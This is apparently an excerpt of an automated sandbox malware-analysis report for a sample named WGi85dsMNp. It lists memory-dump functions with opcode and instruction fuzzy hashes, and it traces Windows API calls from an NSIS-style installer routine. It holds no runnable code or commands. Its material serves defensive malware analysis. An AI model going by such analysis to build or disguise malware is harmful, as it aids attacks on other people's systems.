Opcode Fuzzy Hash: 66c8d1b79e01aab9e849613edb078969c8299ff26d3e00faaf95ffd91c129ee6
Instruction Fuzzy Hash: 0A21F271604204EFCB24DFA4D980F26BBA5EB89314F24C56AD94A4B656C33AD846CA62

Function 00160EC8 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3920420620.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_160000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34e52d353effcbbbeda50b0ffe37270e9dc03627f578d26609e9039501e9eefd
Instruction ID: 57eb952bf51cdbf6bd6fef8a66f38e5da6c6cc45187a45862812d701e780565c
Opcode Fuzzy Hash: 34e52d353effcbbbeda50b0ffe37270e9dc03627f578d26609e9039501e9eefd
Instruction Fuzzy Hash: 54216030E04208DFDB0AEFB9C4516AEB7B6EF8A304F0084B994049B296DB785D56CF51

Function 0016B2C2 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3920420620.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_160000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54c4aea5f071534cdff8ec6cc8d31aa0bf40fba1c2b67e2b79e45e0694fd179c
Instruction ID: d407841b11a965886ed14f30caa1055f40c25607cf8af8965959a5f7906a36de
Opcode Fuzzy Hash: 54c4aea5f071534cdff8ec6cc8d31aa0bf40fba1c2b67e2b79e45e0694fd179c
Instruction Fuzzy Hash: 58112736B0C3915FDB229B358CA492E3BE6AF8161571440BDD446CB662EF61CC518742

Function 0016324D Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3920420620.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_160000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78ce69ec3e546cb18eb093aa28624b4604c126a4767fe3c09cca03120c5787c7
Instruction ID: b44c05977e2875d14f6511dafcf4abfbc4eb929952f01fdbb288c165e46eac9f
Opcode Fuzzy Hash: 78ce69ec3e546cb18eb093aa28624b4604c126a4767fe3c09cca03120c5787c7
Instruction Fuzzy Hash: FC319278E11248DFCB44DFA8D59489DBBF6FF49305B208069E819AB364DB35AD42CF40

Function 0016FE60 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3920420620.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_160000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 679d6bfbaab86b24058c6c346276ce1b9831505de1d3348094869a7afae9cf55
Instruction ID: 7fa399f9c011ccb5408f452a091c58489368aefd59e0cfee197e264a4d1064bc
Opcode Fuzzy Hash: 679d6bfbaab86b24058c6c346276ce1b9831505de1d3348094869a7afae9cf55
Instruction Fuzzy Hash: 35215974E04209DFCB00CFA8D580AAEBFF0BF4A300F1044AAD405AB361DB349E45CB91

Function 00168729 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3920420620.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_160000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac3a1b67e423e2ebe5ec5a059aab77992495243495a18323fc3a2e81cff0df6a
Instruction ID: 5ab5a9d9607a3529c7665182472be39c83201cc52e7b21dc340f4d239542d283
Opcode Fuzzy Hash: ac3a1b67e423e2ebe5ec5a059aab77992495243495a18323fc3a2e81cff0df6a
Instruction Fuzzy Hash: 78215A75E002499FCB05DFA5DA50AEEBFB6AF48304F248169E411B72A0DB34DA51DF60

Function 001617B8 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3920420620.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_160000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97af64419104ca1366037deab75a6a357f71eea4a0036e2c5061f3e7937d21e7
Instruction ID: 53924aee28d2f4a7da8d3e80303c3984c48ebb6dcd948fbd24d15142f1f999c6
Opcode Fuzzy Hash: 97af64419104ca1366037deab75a6a357f71eea4a0036e2c5061f3e7937d21e7
Instruction Fuzzy Hash: 31210470D0524A8FCB01DFA8D8545EEBFF4FF4A300F18416AD405B7261EB345A95CBA1

Function 35A9B9C8 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4283077f76610769382ac0eadd8dfc8407b341d47a1caf7d4957f1959250f152
Instruction ID: af5d45d5137e09e0f3c38989c36edbb6c1d732d69e3ab2c82ae566b98929073c
Opcode Fuzzy Hash: 4283077f76610769382ac0eadd8dfc8407b341d47a1caf7d4957f1959250f152
Instruction Fuzzy Hash: B921C578D00219DFDB04EFA5D494AEDBBF1FB48301F508929D515B32A4DB785A86CF90

Function 000AD02B Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3920189046.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ad000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03eaf8a4334ce06a06af18b89caff828b05e34beddbd90a58a88570bb971307e
Instruction ID: 73944a564c1417d810b40fcea04bbbb6e418c2d807b7d868b6c4ed50261e12e5
Opcode Fuzzy Hash: 03eaf8a4334ce06a06af18b89caff828b05e34beddbd90a58a88570bb971307e
Instruction Fuzzy Hash: 4211DD75504280DFCB12CF54D5C4B15FFB2FB89314F28C6AAD84A4BA56C33AD84ACB62

Function 00164E5F Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3920420620.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_160000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 824794fd938257816ad207edc7cbb71e1f0651dc7c1b472e0e3f98199321d2e0
Instruction ID: 618f602e0763ae0e9e91a84d015911496817e3ace9f1cbb178897ec9b568a1cd
Opcode Fuzzy Hash: 824794fd938257816ad207edc7cbb71e1f0651dc7c1b472e0e3f98199321d2e0
Instruction Fuzzy Hash: A3012872B081546FCF059EA5AC11AEF3BE6EBC9340B18802AF505D7291CB728E169B90

Function 35A9F090 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71065a1f04ccbba1caa6289e3fb89ff6b28e085bbc54cb66d13e5bc50d702adf
Instruction ID: 550a0b3fd92446a7469528e44768e7b86e5cd83b1dbe7d1efc29f29f56acd929
Opcode Fuzzy Hash: 71065a1f04ccbba1caa6289e3fb89ff6b28e085bbc54cb66d13e5bc50d702adf
Instruction Fuzzy Hash: 47115B30700A118FD718DF2EC445D5AB7FAAF8A64431585AAE44ACB332EB30ED46DB81

Function 35A9E7F4 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7af821a2298bc86f6c790d37f4d7736a9495ee96538987ccffb59cc5944e6b0e
Instruction ID: f8d481c82b4d9a9f9432206d05adbc9d604c9529c6d221061f6d12c7be14a718
Opcode Fuzzy Hash: 7af821a2298bc86f6c790d37f4d7736a9495ee96538987ccffb59cc5944e6b0e
Instruction Fuzzy Hash: 5B0169307406118F9318DF2EC484D5AB7FAFF8A34431585AAE00ACB331EB30ED469B80

Function 0016B2F0 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3920420620.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_160000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be5e65fb4946293bceaca1e3c2e14d723b7ffc9c85a6c7892aa15121ea53a12f
Instruction ID: 95d6640958bcc4269387960c631d3f06667dd4401b021cbbf1adb646dc8a4b42
Opcode Fuzzy Hash: be5e65fb4946293bceaca1e3c2e14d723b7ffc9c85a6c7892aa15121ea53a12f
Instruction Fuzzy Hash: B1016D36B042115BEB24AB798C9462E76EBBF846657148539D909C7320FF70CD418792

Function 35A9CE50 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18911037f03474a4a1509ed82ccfbfb96f006b53fd95b2f2d132b1c69c2632c5
Instruction ID: 79d684640c217881f5151e25d24d82688f93639d4cc6fcf5ce4b58f094e2684a
Opcode Fuzzy Hash: 18911037f03474a4a1509ed82ccfbfb96f006b53fd95b2f2d132b1c69c2632c5
Instruction Fuzzy Hash: 41018B30D01608CFDB04DFA8C814AEDB7F2FB8A301F909429C905B7251DB399802CB50

Function 00164664 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3920420620.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_160000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be6f88f316467e749509ab411147c90c70329c85c2dd7b80d32f9c30c1a4a868
Instruction ID: 95285da081f67d3356983a5ef29b5d841d3fd1a666b0c9fd5bd4a08f7cbdd29a
Opcode Fuzzy Hash: be6f88f316467e749509ab411147c90c70329c85c2dd7b80d32f9c30c1a4a868
Instruction Fuzzy Hash: E301D4363081459FCB09AF64DC945A97BA2FF4A3107108029F905CB266DB35CE32DF50

Function 35A9EC19 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1630a4156acd1904655d3f3cd96606bda876881aaecd45015d914d4d777d4f50
Instruction ID: b0dfc00a9a1979d8833b7f4e952a882ccdcc334d14eb93ee0646bcd564511ddf
Opcode Fuzzy Hash: 1630a4156acd1904655d3f3cd96606bda876881aaecd45015d914d4d777d4f50
Instruction Fuzzy Hash: 5301FD30E086689BCB159BA88800FEE7BF6BB85360F00416AD8454B642D730A505CBC1

Function 35A9CE60 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00b816e4625d3a7b979abb1708a09be88b87c9779c865273fde5ba14c71b7c84
Instruction ID: 6912398df2eb92716a58081391403b56b6abeb0521b0ea1ed4c4f5b608f42a15
Opcode Fuzzy Hash: 00b816e4625d3a7b979abb1708a09be88b87c9779c865273fde5ba14c71b7c84
Instruction Fuzzy Hash: 24F01474E01608CFDB08DFA9D954AEDB7F1FB8A301F509429C905B3261DB399912CB90

Function 35A9D4C8 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7adccda4ccfdc979bb01fe720b0abebb05e32294e8d78e0a3cebb190ea336a2
Instruction ID: 944130e85faec060ea1425d130b6d020d10548949d907a41fcb81c145bd8e330
Opcode Fuzzy Hash: b7adccda4ccfdc979bb01fe720b0abebb05e32294e8d78e0a3cebb190ea336a2
Instruction Fuzzy Hash: 07F0AB2034021423E70CA57C6880FAB26DEDFC2790F114835E902DB258DE98DC4283F0

Function 0016FC49 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3920420620.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_160000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 142fa027b9726ee9a85345869aea3e525be9e26678d13e450a2639f4a368ec0c
Instruction ID: 618fd6996ed0c8b0fa76bf98be5932c620da0732a57195c0bd8b7de2bc024e1e
Opcode Fuzzy Hash: 142fa027b9726ee9a85345869aea3e525be9e26678d13e450a2639f4a368ec0c
Instruction Fuzzy Hash: 70F04975900248DFDF04DFA4D808AE8BBB2FF8A312F505069E605B22A4CB768D96CB54

Function 35A99608 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47c59085c3bafb1956dbbf9501e14e79f950d055caec4350f112fcf4067d6beb
Instruction ID: 3a7f8a9a95a5512a05af4e75ab04467f3ae0fef88f4c6319382e401263a3d6f4
Opcode Fuzzy Hash: 47c59085c3bafb1956dbbf9501e14e79f950d055caec4350f112fcf4067d6beb
Instruction Fuzzy Hash: ADF0553038022427D20CB2AD5944EBF2AEEEFC1350B01883AEA02D7358DE94DC4687F2

Function 0016B158 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3920420620.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_160000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cea2cc0ce7d25ad6ec843e48e8ccef2ce33350674fa9f1249cba50d802953481
Instruction ID: 4cc02c8a7370a30be36a63f607e5084d6d45110820ed0bef5753f01add4a8bf2
Opcode Fuzzy Hash: cea2cc0ce7d25ad6ec843e48e8ccef2ce33350674fa9f1249cba50d802953481
Instruction Fuzzy Hash: 87F0983441AF829FE3016B30ACBC26A7F70FB0B3177856D55E04AC6472CB6D4459CB10

Function 0016FE10 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3920420620.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_160000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c16413398b53c74d281311a7a002dbf1430b04d09c6791f6dd21f93216d58905
Instruction ID: d69fb71c8c08fc9fb540c923d4d15abc3e0d21d054452b8cf9101ea407cbde9c
Opcode Fuzzy Hash: c16413398b53c74d281311a7a002dbf1430b04d09c6791f6dd21f93216d58905
Instruction Fuzzy Hash: 7CF08274C05208EFCB05EFB8E44899D7FF1EB46301F5091AAC40493296DB354E56DB40

Function 35A9943C Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c4c2a2b0b9db106cb4695b373db192a5f8e6711fcaf653b9283e71322d62357
Instruction ID: f23ed634aeaae57cd3f70c67ea5ffd2c682bd0b4f2aeb5fe40c076ce3e30646a
Opcode Fuzzy Hash: 7c4c2a2b0b9db106cb4695b373db192a5f8e6711fcaf653b9283e71322d62357
Instruction Fuzzy Hash: DDF05531D08308CFC30AA72CD880F6D37BAFFC2754F1008D2C508AB225D729A808E788

Function 00161877 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3920420620.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_160000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a302fcedf224cee6a9cc2054c3a55f28c2de2dfd8bc39c44db740af636776ff
Instruction ID: 270b12c4428589d05e3e81986e029d53748d421fd3fe03cddfadb36f389a006b
Opcode Fuzzy Hash: 9a302fcedf224cee6a9cc2054c3a55f28c2de2dfd8bc39c44db740af636776ff
Instruction Fuzzy Hash: 20E0D831D113578EC7129FB0D8044DDBB30FE83310B0142A7D0147B050EB34194EC762

Function 35A9BD98 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d95ee2e36a9c519f2bd3e0dbcc67960b12874c8e9d633ccbb7077f96e2572bd6
Instruction ID: a79f09666283944d42a229c3b09a4a9f3e63df1b908217666df398eb39841c8f
Opcode Fuzzy Hash: d95ee2e36a9c519f2bd3e0dbcc67960b12874c8e9d633ccbb7077f96e2572bd6
Instruction Fuzzy Hash: 9FE0B630029E56DFE3552F60ACAC6BA7BB4FB0B317FC42C15A80E56422DB7C4450CB55

Function 0016FE20 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3920420620.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_160000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55f089b5f5a49e0599eb63bebb1dace9dec2463b93e0b4e768d11eea263b6b47
Instruction ID: 8454fc00e88eb2dd2b7e83ec746076d614f018a41241e7f6ed6438b9fde3d9b9
Opcode Fuzzy Hash: 55f089b5f5a49e0599eb63bebb1dace9dec2463b93e0b4e768d11eea263b6b47
Instruction Fuzzy Hash: 83E09274D05208DFC704EFB8E44869CBBF4EB49301F6080BAD804A3351EB318E52CB40

Function 00161888 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3920420620.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_160000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c558cc39819e034431a0ee7b0f84aacc075a6db457739eac980aae47ba1e018
Instruction ID: 2d6707e3fd42b7d1f3103e89c27e73df1d19edefd0e9b4ef59037cf632b731a8
Opcode Fuzzy Hash: 7c558cc39819e034431a0ee7b0f84aacc075a6db457739eac980aae47ba1e018
Instruction Fuzzy Hash: 67D05B31D2022B97CB11E7A5DC044DFF738EED5265B504626D51837140FB703659C6E1

Function 001656FF Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3920420620.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_160000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f11ddd29d66bc5058052c8564562cd15f4d0483c8de124f904ccd31299556f22
Instruction ID: 49a455948d6b5299aed4516c2f7646b994dbbb4fde6c44bee41639bcb3a7f54e
Opcode Fuzzy Hash: f11ddd29d66bc5058052c8564562cd15f4d0483c8de124f904ccd31299556f22
Instruction Fuzzy Hash: A1E0C23104C3C40EC607F731EE545893F6E9F81204F1444A9D0050B56BEA7C2E4E9B61

Function 35A9CF30 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 027a6ff73fd0f6622f6c5a2e1ae02d83dbd74481718b89c9d5be79968739aaaf
Instruction ID: f2e51bf75b538353ae88a240a1d57bc62679f4f4cf054ba5a6c92de8396c32e9
Opcode Fuzzy Hash: 027a6ff73fd0f6622f6c5a2e1ae02d83dbd74481718b89c9d5be79968739aaaf
Instruction Fuzzy Hash: D2C08C312B4904CFE700DE2CE400BC373A8EF4AB14FA024A0E809DFA61C32AFC018A08

Function 00169F6D Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3920420620.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_160000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 817bb52a4a8189b0fc4ec7726e83cec88e7308417f86d399926eb195dcb20a72
Instruction ID: ac3eacb7c8d8f0a4ede675a5c42f927971ab596706c5bb73d2a8530ebe803afd
Opcode Fuzzy Hash: 817bb52a4a8189b0fc4ec7726e83cec88e7308417f86d399926eb195dcb20a72
Instruction Fuzzy Hash: 4DD0673AB40018AFCB049F98EC808DDFB76FB98221B048116F915A3261C6319965DB50

Function 35A995D8 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b7464106ef70b06c94e9011503a196f864b699a380b14405c15852a173fc924
Instruction ID: 7c3a928bf1d6dfde52d0b2775d1829fc2f613c61945f8be002bd70a7f4eacd4c
Opcode Fuzzy Hash: 5b7464106ef70b06c94e9011503a196f864b699a380b14405c15852a173fc924
Instruction Fuzzy Hash: 51C012322455201B561CA21DB944CDE56A9CDC63117A18976A505C61184D54994B81C4

Function 0016FF30 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3920420620.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_160000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 175d2652b85c947f0a59974e9fa32b53f63ac11379f3af119ec9fcedfca46fe3
Instruction ID: 63bb9376b0b4caf77bb1aaccd81a4e60e6976befcd3e511e3295cbb37a25fbd7
Opcode Fuzzy Hash: 175d2652b85c947f0a59974e9fa32b53f63ac11379f3af119ec9fcedfca46fe3
Instruction Fuzzy Hash: 6ED0C9708162089FC744DFA8E806AA9B779E747312F4051A9A40863251DB755D20D699

Function 35A9D095 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1858c2598eadcf6c54d87ef88a6d005e4bb9274fbefbecc46d678dce59d784ee
Instruction ID: 7613446bb5e2cd31eb69eba5c3afc4415b864e226ceae56deaa2d9ffc5d2a01b
Opcode Fuzzy Hash: 1858c2598eadcf6c54d87ef88a6d005e4bb9274fbefbecc46d678dce59d784ee
Instruction Fuzzy Hash: 73D0A71134E7D40FE707D3347454D5D7F704E8224074549E6D15CCB4E6D6494A4E8747

Function 35A9BD48 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5872efa960adbe3fa15e9323f5de68ea31fc61779092844ab95c576afd65ead
Instruction ID: a2c4ee37fdb851183b1ddeced5345f5e28d193366cb486a40155d951f4ef843d
Opcode Fuzzy Hash: f5872efa960adbe3fa15e9323f5de68ea31fc61779092844ab95c576afd65ead
Instruction Fuzzy Hash: 50C01278019E098BE2082B50AC0CBB9B6A8B747313FC82910A409028318BB88424D654

Function 35A994B4 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad35ea5f3809056bf118472d569fb22e7ff037fdb486cf92dc9d55aee50c62b1
Instruction ID: babb0a3f05f066893ff36105fa4e29890d7b8410ea06cadd5f1eb54387e9fd50
Opcode Fuzzy Hash: ad35ea5f3809056bf118472d569fb22e7ff037fdb486cf92dc9d55aee50c62b1
Instruction Fuzzy Hash: C7C08C302A87088FE200AA1DC988E6133ACEF86B04F6058E0F5048B635CB62FC008A04

Function 00165710 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3920420620.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_160000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c385fb274e093567ecbd88fef34581c6826040271664045d3b0e7b05af9ccb53
Instruction ID: ad7fba3f01d60560e6998f5e7fab00fab504b478beea884960173eadbba0dcbd
Opcode Fuzzy Hash: c385fb274e093567ecbd88fef34581c6826040271664045d3b0e7b05af9ccb53
Instruction Fuzzy Hash: 3CC012300443084EC549FB65EF45955776EAF802047648560A0060657FEFB85D5B8B90

Non-executed Functions

Function 004034A5 Relevance: 75.7, APIs: 32, Strings: 11, Instructions: 410stringfilecomCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32 ref: 004034C8
GetVersion.KERNEL32 ref: 004034CE
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403501
#17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040353E
OleInitialize.OLE32(00000000), ref: 00403545
SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 00403561
GetCommandLineW.KERNEL32(00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 00403576
CharNextW.USER32(00000000,00435000,00000020,00435000,00000000,?,00000006,00000008,0000000A), ref: 004035AE

Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF

GetTempPathW.KERNEL32(00000400,00437800,?,00000006,00000008,0000000A), ref: 004036E8
GetWindowsDirectoryW.KERNEL32(00437800,000003FB,?,00000006,00000008,0000000A), ref: 004036F9
lstrcatW.KERNEL32(00437800,\Temp,?,00000006,00000008,0000000A), ref: 00403705
GetTempPathW.KERNEL32(000003FC,00437800,00437800,\Temp,?,00000006,00000008,0000000A), ref: 00403719
lstrcatW.KERNEL32(00437800,Low,?,00000006,00000008,0000000A), ref: 00403721
SetEnvironmentVariableW.KERNEL32(TEMP,00437800,00437800,Low,?,00000006,00000008,0000000A), ref: 00403732
SetEnvironmentVariableW.KERNEL32(TMP,00437800,?,00000006,00000008,0000000A), ref: 0040373A
